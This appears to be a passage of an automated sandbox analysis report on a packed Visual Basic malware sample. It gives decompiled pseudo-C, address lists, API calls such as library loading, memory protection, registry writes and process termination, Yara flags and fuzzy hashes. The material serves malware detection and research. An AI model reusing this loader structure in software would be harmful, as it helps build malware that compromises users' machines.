												_t156 =  *0x42f034; // 0x605420
												_t119 =  *((intOrPtr*)(_t156 + _t117 * 0xffffffff));
												 *((char*)(_t150 + _t140 * 0xffffffff)) = _t119;
												_push( *0x42f034);
												L004013B6();
												 *0x42f040 = _t119;
												_v96 = _v96 | 0x0000ffff;
												 *0x42f044 = _v96;
												return _v96;
											} else {
												_push(_t115);
												return E0042D886();
											}
										} else {
											L004015E4();
											_v20 = _v8 & 0x000000ff;
											L25:
											return _v20;
										}
									}
								} else {
									_push(E0042D947(_t98));
									_v16 = E0042D8DC(_v20);
									goto L18;
								}
							}
						} else {
							_t147 =  *0x42f034; // 0x605420
							 *((char*)(_t147 + _t91)) = _a4;
							goto L13;
						}
					}
				} else {
					_v32 = _t90;
					L27();
					_v60 = 0x80020004;
					_v68 = 0xa;
					_v44 = 0x80020004;
					_v52 = 0xa;
					L00401320();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401320();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10, _v32, _a8);
					asm("fclex");
					_v76 = _t133;
					if(_v76 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x40fd8c);
						_push(_a4);
						_push(_v76);
						L004015C6();
						_v88 = _t133;
					}
					_push(0x42d6d6);
					L004015C0();
					return _t133;
				}
			}

0x0042d58e
0x0042d59e
0x0042d5a8
0x0042d5b0
0x0042d5b3
0x0042d5c1
0x0042d5d2
0x0042d5d5
0x0042d5d7
0x0042d5de
0x0042d5f7
0x0042d5e0
0x0042d5e0
0x0042d5e2
0x0042d5e7
0x0042d5ea
0x0042d5ed
0x0042d5f2
0x0042d5f2
0x0042d5fe
0x0042d601
0x0042d607
0x0042d608
0x0042d60d
0x0042d610
0x0042d611
0x0042d616
0x0042d617
0x0042d61c
0x0042d622
0x0042d627
0x0042d62a
0x0042d62f
0x0042d634
0x0042d6e9
0x0042d6ee
0x0042d6ef
0x0042d6f1
0x0042d6fa
0x0042d713
0x0042d714
0x0042d6fc
0x0042d6ff
0x0042d705
0x0042d717
0x0042d71c
0x0042d71d
0x0042d71f
0x0042d722
0x0042d730
0x0042d758
0x0042d75c
0x0042d732
0x0042d73a
0x0042d741
0x0042d744
0x0042d75f
0x0042d764
0x0042d765
0x0042d767
0x0042d76a
0x0042d77d
0x0042d7a7
0x0042d7ac
0x00000000
0x0042d7ae
0x0042d7b6
0x00000000
0x0042d7b6
0x0042d77f
0x0042d789
0x0042d7c2
0x0042d7c2
0x0042d7c7
0x0042d7c8
0x0042d7ca
0x0042d7cd
0x0042d7dc
0x0042d7ee
0x0042d7f3
0x0042d7de
0x0042d7e1
0x0042d7e6
0x0042d7e6
0x0042d7f9
0x0042d802
0x0042d80f
0x0042d819
0x0042d81e
0x0042d822
0x0042d825
0x0042d831
0x0042d836
0x0042d839
0x0042d83c
0x0042d841
0x0042d844
0x0042d84a
0x0042d84e
0x0042d854
0x0042d85a
0x0042d85d
0x0042d860
0x0042d866
0x0042d86b
0x0042d870
0x0042d879
0x0042d885
0x0042d827
0x0042d827
0x0042d82e
0x0042d82e
0x0042d78b
0x0042d797
0x0042d79c
0x0042d7ba
0x0042d7bf
0x0042d7bf
0x0042d789
0x0042d746
0x0042d74c
0x0042d755
0x00000000
0x0042d755
0x0042d744
0x0042d707
0x0042d707
0x0042d710
0x00000000
0x0042d710
0x0042d705
0x0042d63a
0x0042d63a
0x0042d643
0x0042d648
0x0042d64f
0x0042d656
0x0042d65d
0x0042d667
0x0042d671
0x0042d672
0x0042d673
0x0042d674
0x0042d678
0x0042d682
0x0042d683
0x0042d684
0x0042d685
0x0042d68e
0x0042d694
0x0042d696
0x0042d69d
0x0042d6b9
0x0042d69f
0x0042d69f
0x0042d6a4
0x0042d6a9
0x0042d6ac
0x0042d6af
0x0042d6b4
0x0042d6b4
0x0042d6bd
0x0042d6d0
0x0042d6d5
0x0042d6d5

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042D5A8
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401326), ref: 0042D5C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FD8C,00000058), ref: 0042D5ED
__vbaObjSetAddref.MSVBVM60(?,?), ref: 0042D608
#644.MSVBVM60(?,?,?), ref: 0042D611
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042D667
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042D678
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FD8C,000002B0), ref: 0042D6AF

Strings

T`, xrefs: 0042D707

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckHresult$#644
String ID: T`
API String ID: 918999588-1416193786
Opcode ID: 4f3384b6da5b44a1d48caa1093677e5dd369000ee774d9870975ef986f362a83
Instruction ID: bea62c78bce81736e22b7a87980b4eadc094e3b9ff6e2d48256a9c7243b7a6d1
Opcode Fuzzy Hash: 4f3384b6da5b44a1d48caa1093677e5dd369000ee774d9870975ef986f362a83
Instruction Fuzzy Hash: 6B414771D00258EFDF01EFA1D846B9EBBB5BF08344F50402AF901BB2A1D7B99946CB58

Uniqueness

Uniqueness Score: -1.00%

Function 02294854, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,DA00629C,?,0228DFA5,?,00000000,?,?), ref: 022922BB

Strings

T|', xrefs: 0229488F

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: T|'
API String ID: 1029625771-1718224011
Opcode ID: b12bf8a9ba4032bcca88838929590d4e5ae0e7b9df05d4bb4feab54d29ab23df
Instruction ID: b18adab31f43fa4c81bf50875c3b29dc8fdd3ca6b925d05551174bde367c63f9
Opcode Fuzzy Hash: b12bf8a9ba4032bcca88838929590d4e5ae0e7b9df05d4bb4feab54d29ab23df
Instruction Fuzzy Hash: 433134B2918388DBEF74AFA58C647FE77A5EF90710F11451DDC868B214C7B18A41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00401604, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401609

Strings

VB5!6&*, xrefs: 00401604

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 026df168e7c67f43ca6874aae07688e2dce8ec711a5b56096852f153f0f33944
Instruction ID: e9e89b88d4980ab55a1463ada620c0d2589837fa0715ecc8b06d6259711e8e0f
Opcode Fuzzy Hash: 026df168e7c67f43ca6874aae07688e2dce8ec711a5b56096852f153f0f33944
Instruction Fuzzy Hash: BD01406544E3C14FD34B8B714A221847F709E13668B0A01EBD482EF4B3D1AD0C5ED723

Uniqueness

Uniqueness Score: -1.00%

Function 02285E9E, Relevance: 1.6, APIs: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.KERNELBASE(A76BAD07), ref: 02285F9D

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cc0daea16bec4d2de9eca2e51b3c9923aa77f4fb26a269c1b552aed511788fe9
Instruction ID: e035dc2555e57bfdcf28893631fdf29f40e91f5ae46e12b38190d760b7a875c2
Opcode Fuzzy Hash: cc0daea16bec4d2de9eca2e51b3c9923aa77f4fb26a269c1b552aed511788fe9
Instruction Fuzzy Hash: C241BD30F652C2A6C7355A7C82103B2BFAAEE9BA00719F0DDF59985D46C723D067CB45

Uniqueness

Uniqueness Score: -1.00%

Function 02283D79, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-008BDC8E), ref: 0228CDF7

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f016603a24e5c78253d9dc6c7be400fccc3fc5b181cfadb874a840e9cb7af73a
Instruction ID: 0e905d8961b9747c60847c3b25fdc3a3e2c4746dc429e09d3f5bb787a3d1943a
Opcode Fuzzy Hash: f016603a24e5c78253d9dc6c7be400fccc3fc5b181cfadb874a840e9cb7af73a
Instruction Fuzzy Hash: 5F21643001C7CAEFCB258FB8C88929ABF60EF06304F8582DDC8910B596E3721249C741

Uniqueness

Uniqueness Score: -1.00%

Function 02292187, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,DA00629C,?,0228DFA5,?,00000000,?,?), ref: 022922BB

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e5576c76d18e6cb9da248752906605a0740d680d553aa8f2bee5ac2b0f342656
Instruction ID: f127f6f417fa2e1e29ba40bc037cc56a73235e8742ef3e245f53ec1ab15736c3
Opcode Fuzzy Hash: e5576c76d18e6cb9da248752906605a0740d680d553aa8f2bee5ac2b0f342656
Instruction Fuzzy Hash: 74F0A4B1A046A8EFCF309FA99C447EE77A9AF84760F014016AC4CDB204C6B08E00CF90

Uniqueness

Uniqueness Score: -1.00%

Function 022815DE, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 022815E0

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 3112891dcf3099c3a0e7f89f098c732920f18c064b9830d1849ca502efeb4f70
Instruction ID: 4a0cf77a227b62588556b2c6b88adcd20719009ec558597f534881d5d0c9d530
Opcode Fuzzy Hash: 3112891dcf3099c3a0e7f89f098c732920f18c064b9830d1849ca502efeb4f70
Instruction Fuzzy Hash: BBF0B4721297008FD718DE70CD444697BF2EFC4210F26455EC156E7975D3309902CB46

Uniqueness

Uniqueness Score: -1.00%

Function 02290D17, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,-00000001931AFC24,0228635E,?,022902CB), ref: 02291095

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: ec84724ac981cb364096e7fd0bb8cd1e7056d7c569c0bb3b60be6f6cfd07126e
Instruction ID: f553f067feb52271c1c4c1ab0a79362b5d8f98d65673ec67d688d3862bdc445b
Opcode Fuzzy Hash: ec84724ac981cb364096e7fd0bb8cd1e7056d7c569c0bb3b60be6f6cfd07126e
Instruction Fuzzy Hash: 8AF0B47162834ADFDF30CE64C8C4BEA36B8AF58340F40412ADC4D57214D3B15E04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF14, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703626ea9bb62c148e2f1dfd72a3b4daa99db2fd77c3e3158abe1365a30b7abe
Instruction ID: 73a869b9cce649cf806a65f9558ff06b80128f7bbb0ce553cb59bd98c7dcf3a5
Opcode Fuzzy Hash: 703626ea9bb62c148e2f1dfd72a3b4daa99db2fd77c3e3158abe1365a30b7abe
Instruction Fuzzy Hash: 11B01210388002EAE334825CDD4282131A0B2403C03704C33F900E1DF1DA78CD0C823D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02289E52, Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

HkN:, xrefs: 0228A1C2
LFtU, xrefs: 0228A05A
6, xrefs: 02289F1F

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 6$HkN:$LFtU
API String ID: 0-1966482110
Opcode ID: 43dd91b8e61570d7256e7c27192ff1b83bed8c1a0d1b4ba0cf7c5b92be0c2c8a
Instruction ID: fde2539f7a7fd9c54e69aff211c1a5bef67879ba58c13fc0871496c370a70c38
Opcode Fuzzy Hash: 43dd91b8e61570d7256e7c27192ff1b83bed8c1a0d1b4ba0cf7c5b92be0c2c8a
Instruction Fuzzy Hash: 8731A4312157858FDB32CFB8C894BC67BA1AF12364F48C299CC984B6DBE7359142C741

Uniqueness

Uniqueness Score: -1.00%

Function 02295252, Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

:r|', xrefs: 02295963

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: :r|'
API String ID: 3389902171-3475503222
Opcode ID: 9739c367d28f9230a7ae69cdc3c874a6c1f996042c8c0bdad17cc06545f3bf90
Instruction ID: d8e9951a652e89fcfefa6a9873dae558b58cf65553ea95e63bb16ad29deb79a5
Opcode Fuzzy Hash: 9739c367d28f9230a7ae69cdc3c874a6c1f996042c8c0bdad17cc06545f3bf90
Instruction Fuzzy Hash: E922C8716183C58FDF31DF78C8987DABBE2AF56310F49819AC8998F29AD3748541CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0228CE2E, Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ded287ede67e7d49665f940b57fe3d86d261e62fff9f2769d34eecf5ba38948c
Instruction ID: 418036555007cfb167e3b1041501584c632b9360ce4cebf6888df6813beebdb5
Opcode Fuzzy Hash: ded287ede67e7d49665f940b57fe3d86d261e62fff9f2769d34eecf5ba38948c
Instruction Fuzzy Hash: E5D19B30A257C1AAC7355F7C86413D2BFE6FF4AA14728B29DE4958AD97C322E017CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02282E19, Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 213f3a1125ba10786e15f20ec706dec3d89306daa0a5b0d226f934f11767b231
Instruction ID: e16148a72b55fea5051980affd4a6409a0690557657952101221d6992cafbccd
Opcode Fuzzy Hash: 213f3a1125ba10786e15f20ec706dec3d89306daa0a5b0d226f934f11767b231
Instruction Fuzzy Hash: 92A14B30E252C1ABC7358F7C81113A2BFA6EF9AE00728B5DDE5898AD56C323D053CB45

Uniqueness

Uniqueness Score: -1.00%

Function 02281772, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36dac07691b410c8afa366d0747a0283a00fcecfb45eb3dd1f79a2e65c41191
Instruction ID: a571975c6e7d3d8192dea9680a744698a3250db39e48b7a832da7daa0986f7c8
Opcode Fuzzy Hash: a36dac07691b410c8afa366d0747a0283a00fcecfb45eb3dd1f79a2e65c41191
Instruction Fuzzy Hash: E7A14C30E652C2AAD7355A7CC111362BFAAEE96B04728F19DE58D86D96C323C077CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02280947, Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baec77ee953062b3bb99ae916a6c76b83c3263ec3f5276b1d7a3552cfae2ca97
Instruction ID: 945f52d2325e2cf82489c0633d2c65faea95ca20afe9dd9f01983515678cd3cd
Opcode Fuzzy Hash: baec77ee953062b3bb99ae916a6c76b83c3263ec3f5276b1d7a3552cfae2ca97
Instruction Fuzzy Hash: 56917830965381AFC7348F7C844139ABBB5FF4AB00B14A58DE9989BD56C372C15BCB81

Uniqueness

Uniqueness Score: -1.00%

Function 0228A760, Relevance: .2, Instructions: 232libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,DA00629C,?,0228DFA5,?,00000000,?,?), ref: 022922BB

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0418193256489123592cca7c19b26317fba7990c6137e34dbac5fd7755e64d53
Instruction ID: 04d9e011e05954cb5b6c4eeca1919bc378f55a2da4c9fddcf60cafd131c4b18a
Opcode Fuzzy Hash: 0418193256489123592cca7c19b26317fba7990c6137e34dbac5fd7755e64d53
Instruction Fuzzy Hash: 04913172A24345DBDB70AFB4CD447EE7BB2FF44310F5A411ADD89AB254D3748A418B82

Uniqueness

Uniqueness Score: -1.00%

Function 0228395F, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b453a7d7c703dde12fbf17a513cb26d8df747e4b931428adb72609b78eadd6
Instruction ID: 79922ad5bfa0adf445ea9acb6e9feefc884b4b50fb97306b1ce37535613f0f88
Opcode Fuzzy Hash: b9b453a7d7c703dde12fbf17a513cb26d8df747e4b931428adb72609b78eadd6
Instruction Fuzzy Hash: D5810330A257C2AAC735DF7CC501396BFA5EF86B00B18A1DDE9988A987D372D057CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02282E67, Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f070583e22c1049300fca5ee7229f3799f180414e34a41b6d86a09f11da7fa9d
Instruction ID: b037762ea61e5f80aabf198dd0de3ca24f9795dc06ff652b7e20d1170add7f79
Opcode Fuzzy Hash: f070583e22c1049300fca5ee7229f3799f180414e34a41b6d86a09f11da7fa9d
Instruction Fuzzy Hash: 56517130E552C5EBC7358F7C81013A2BFF6EF9A600B14669CE889CAD56D322D053CB45

Uniqueness

Uniqueness Score: -1.00%

Function 022818CB, Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df1a61075f5c28385e85e5836db5efc5d8241c32d897c05e4f9c27a8b2de47c3
Instruction ID: 9713d8a5e46519a39c43a308a102d305a976ddcfffcc36d32cffaf58219acff2
Opcode Fuzzy Hash: df1a61075f5c28385e85e5836db5efc5d8241c32d897c05e4f9c27a8b2de47c3
Instruction Fuzzy Hash: 4D515C30A282C2AAD7359B7C8111361FFAAEE97A0072CA59DE5DD86D97D313C073C741

Uniqueness

Uniqueness Score: -1.00%

Function 02294BE5, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abee771e00e2cf6c5af88ce027bf401b5a3bd7cd332ef5d60f8a499128546c9b
Instruction ID: 96e04bdd83a6ed4004f001d24b4fd14ee74c02e1bbfd90af9754368b94957a00
Opcode Fuzzy Hash: abee771e00e2cf6c5af88ce027bf401b5a3bd7cd332ef5d60f8a499128546c9b
Instruction Fuzzy Hash: 43419CB5604645CFDF24CF58C8C0BDAB7A2FF89314F65816ADD488B31AD7B4A982CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02281844, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0aeabbf58cdb715e7bc6c37fbfb1f599f0e4e69dc7f35790bf244041e8e7ad
Instruction ID: 9aedd1ab43dc2253645eb78f8bcc93b74c27c938f33ec0cd5f2d894716d2b670
Opcode Fuzzy Hash: 2c0aeabbf58cdb715e7bc6c37fbfb1f599f0e4e69dc7f35790bf244041e8e7ad
Instruction Fuzzy Hash: BE41CE7101D3D1DFD71A9F70845A4A9BBA2EF42300F25099DC9D68FA9AC3318563C742

Uniqueness

Uniqueness Score: -1.00%

Function 02292C8E, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d513a35e6a46c61f05592062c4fd38e2f7879efd1ac628224cbc50e65809a21
Instruction ID: 1819175dbbd7199a8a2e09a478ff5b11dd588995d30eb9e52d9766d0defe03c9
Opcode Fuzzy Hash: 1d513a35e6a46c61f05592062c4fd38e2f7879efd1ac628224cbc50e65809a21
Instruction Fuzzy Hash: 04116974215398DFDB39CF68C984BDA73B5BF88741F55425ADC4A8B228C730AA42CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0228CE02, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaa980c5b6b6d3303801d05d0ab8baeeda448c5f792df5a7d7d8d67afdffd11b
Instruction ID: 671e8ae7292e669e273bfbcaae4d8365c67d8df4a65290638d5993bedabb54b6
Opcode Fuzzy Hash: aaa980c5b6b6d3303801d05d0ab8baeeda448c5f792df5a7d7d8d67afdffd11b
Instruction Fuzzy Hash: EFB092B63426818FFF06CE18C491B4073E0FB04A44B0904E4E402CB711D228E900CA00

Uniqueness

Uniqueness Score: -1.00%

Function 022920B6, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0042D10F, Relevance: 110.6, APIs: 55, Strings: 8, Instructions: 323
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0042D10F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v40;
				char _v52;
				char _v60;
				char _v64;
				signed int _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				char _v116;
				char* _v124;
				intOrPtr _v132;
				intOrPtr _v140;
				char _v148;
				char _v152;
				signed int _v156;
				intOrPtr _v168;
				signed int _v172;
				signed int _t124;
				char* _t129;
				signed int _t166;
				signed int _t180;
				char* _t183;
				void* _t254;
				void* _t256;
				intOrPtr _t257;

				_t257 = _t256 - 0xc;
				 *[fs:0x0] = _t257;
				L00401320();
				_v16 = _t257;
				_v12 = 0x4012f8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401326, _t254);
				_push(8);
				_push(0x410798);
				_push( &_v52);
				L004013E6();
				_v124 = L"15:15:15";
				_v132 = 8;
				L0040149A();
				_push( &_v84);
				_push( &_v100);
				L004013E0();
				_v140 = 0xf;
				_v148 = 0x8002;
				_push( &_v100);
				_t124 =  &_v148;
				_push(_t124);
				L00401410();
				_v156 = _t124;
				_push( &_v100);
				_push( &_v84);
				_push(2);
				L00401590();
				if(_v156 != 0) {
					_v76 = 0x83395b;
					_v84 = 3;
					_push( &_v84);
					_push( &_v100);
					L004013DA();
					_push( &_v100);
					L00401560();
					L004015B4();
					L0040158A();
					L00401578();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L00401590();
					L0040158A();
					_push(0x30);
					_push(0xd3);
					_push(0x80);
					_push( &_v84);
					L004013D4();
					_push( &_v84);
					L00401560();
					L004015B4();
					_push(4);
					L0040158A();
					L00401578();
					L004015A8();
					_push(4);
					L0040158A();
					_v124 = L"Psychobiologic";
					_v132 = 8;
					L0040149A();
					_push(0x49);
					_push( &_v84);
					_push( &_v100);
					L004013CE();
					_push( &_v100);
					L00401560();
					L004015B4();
					_push(4);
					L0040158A();
					L00401578();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L00401590();
					_push(4);
					L0040158A();
					_push(4);
					L0040158A();
					_v76 = 0x80020004;
					_v84 = 0xa;
					_push( &_v84);
					_push( &_v100);
					L004013C8();
					_push( &_v100);
					L00401560();
					L004015B4();
					_push(4);
					L0040158A();
					L00401578();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L00401590();
					_v76 = 0x80020004;
					_v84 = 0xa;
					_push( &_v84);
					_push( &_v100);
					L004013C8();
					_push( &_v100);
					L00401560();
					L004015B4();
					_push(4);
					L0040158A();
					L00401578();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L00401590();
					_push(0xe1);
					L0040144C();
					L004015B4();
					_t166 = _v68;
					_v168 = _t166;
					_v68 = _v68 & 0x00000000;
					_push(0x15);
					L004015B4();
					_push(_t166);
					L004013C2();
					L004015B4();
					_push(4);
					L0040158A();
					_push( &_v68);
					_push( &_v64);
					_push( &_v60);
					_push(3);
					L00401542();
					_push(4);
					L0040158A();
					_push(L"16:16:16");
					_push( &_v84);
					L0040153C();
					_push( &_v84);
					L00401560();
					L004015B4();
					_push(4);
					L0040158A();
					L00401578();
					L004015A8();
					_v140 = _v28;
					_v148 = 3;
					_v76 =  *0x4012f0;
					_v84 = 4;
					_push( &_v100);
					_t180 =  &_v84;
					_push(_t180);
					L00401512();
					_v156 = _t180;
					if(_v156 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(_v156);
						L00401506();
						_v172 = _t180;
					}
					_push( &_v148);
					_push( &_v100);
					_t183 =  &_v116;
					_push(_t183);
					L004013BC();
					_push(_t183);
					L00401500();
					_v28 = _t183;
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L00401590();
				}
				asm("wait");
				_push(0x42d56e);
				_v152 =  &_v52;
				_t129 =  &_v152;
				_push(_t129);
				_push(0);
				L004013FE();
				return _t129;
			}

0x0042d112
0x0042d121
0x0042d12d
0x0042d135
0x0042d138
0x0042d13f
0x0042d14e
0x0042d151
0x0042d153
0x0042d15b
0x0042d15c
0x0042d161
0x0042d168
0x0042d175
0x0042d17d
0x0042d181
0x0042d182
0x0042d187
0x0042d191
0x0042d19e
0x0042d19f
0x0042d1a5
0x0042d1a6
0x0042d1ab
0x0042d1b5
0x0042d1b9
0x0042d1ba
0x0042d1bc
0x0042d1cd
0x0042d1d3
0x0042d1da
0x0042d1e4
0x0042d1e8
0x0042d1e9
0x0042d1f1
0x0042d1f2
0x0042d1fc
0x0042d206
0x0042d20e
0x0042d216
0x0042d21a
0x0042d21b
0x0042d21d
0x0042d230
0x0042d235
0x0042d237
0x0042d23c
0x0042d244
0x0042d245
0x0042d24d
0x0042d24e
0x0042d258
0x0042d25f
0x0042d269
0x0042d271
0x0042d279
0x0042d283
0x0042d28e
0x0042d293
0x0042d29a
0x0042d2a7
0x0042d2ac
0x0042d2b1
0x0042d2b5
0x0042d2b6
0x0042d2be
0x0042d2bf
0x0042d2c9
0x0042d2d0
0x0042d2db
0x0042d2e3
0x0042d2eb
